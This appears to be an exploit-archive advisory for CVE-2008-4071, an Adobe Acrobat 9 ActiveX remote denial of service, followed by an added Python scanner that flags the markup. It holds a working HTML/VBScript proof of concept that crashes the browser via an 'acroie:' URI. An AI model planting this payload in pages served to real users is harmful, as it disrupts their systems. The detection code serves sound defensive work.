Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

Published: 2008.09.17
Credit: Jeremy Brown
Risk: Medium
CWE: CWE-20, CWE-noinfo
CVE: CVE-2008-4071
Local: No
Remote: Yes

CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com)
Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista
I can't seem to reproduce this on XP! Oh well.
Of course the most popular app for reading pdfs is SfS/SfI :)
Basically it will crash with any uri that adobe doesn't like.
Also interesting: try with file:///DoS and look in bottom left area -->

<html><body>

<object id=target classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>
<script language=vbscript>

arg1="acroie:///DoS"
target.src = arg1

</script>
</body></html>
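
For content inspection (proxy, mail gateway, or web-cache triage), the PoC above has three observable traits: an `<object>` bound to the Acrobat control's CLSID, an `acroie:` URI, and a script assignment to that object's `src`. The scanner below is an added example, not part of the original advisory; the function name, finding labels and `SAMPLE` input are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID and URI scheme come from the PoC on this page; all other names are illustrative.
ACROBAT_CLSID = "ca8a9780-280d-11cf-a24d-444553540000"
ACROIE_URI = re.compile(r"acroie:", re.I)
# Constructed input with the same shape as the PoC (unquoted attributes, VBScript).
SAMPLE = ('<object id=target classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>'
          '<script language=vbscript>\narg1="acroie:///DoS"\ntarget.src = arg1\n</script>')

class _Scanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.targets = []      # id/name of each <object> bound to the CLSID
        self.attr_uri = False  # acroie: URI found in an <object>/<param> attribute
        self.script = []       # text of every <script> body
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
        if tag == "object":
            clsid = a.get("classid", "").lower().replace("clsid:", "").strip("{} ")
            if clsid == ACROBAT_CLSID:
                self.targets.append(a.get("id") or a.get("name") or "")
        if tag in ("object", "param"):
            self.attr_uri |= any(ACROIE_URI.search(v) for v in a.values())

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script.append(data)

def scan_html(html):
    """Return findings for markup that drives the Acrobat control with an acroie: URI."""
    s = _Scanner()
    s.feed(html)
    s.close()
    if not s.targets:          # no Acrobat control on the page: nothing to report
        return []
    findings = ["acrobat-activex-object"]
    script = "\n".join(s.script)
    if s.attr_uri or ACROIE_URI.search(script):
        findings.append("acroie-uri")
    for t in filter(None, s.targets):
        if re.search(r"\b%s\s*\.\s*src\s*=" % re.escape(t), script, re.I):
            findings.append("src-assignment:" + t)
    return findings
```

The control alone is common on pages that embed PDFs, so treat `acrobat-activex-object` by itself as informational and alert only when `acroie-uri` accompanies it.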

References:

http://www.milw0rm.com/exploits/6424
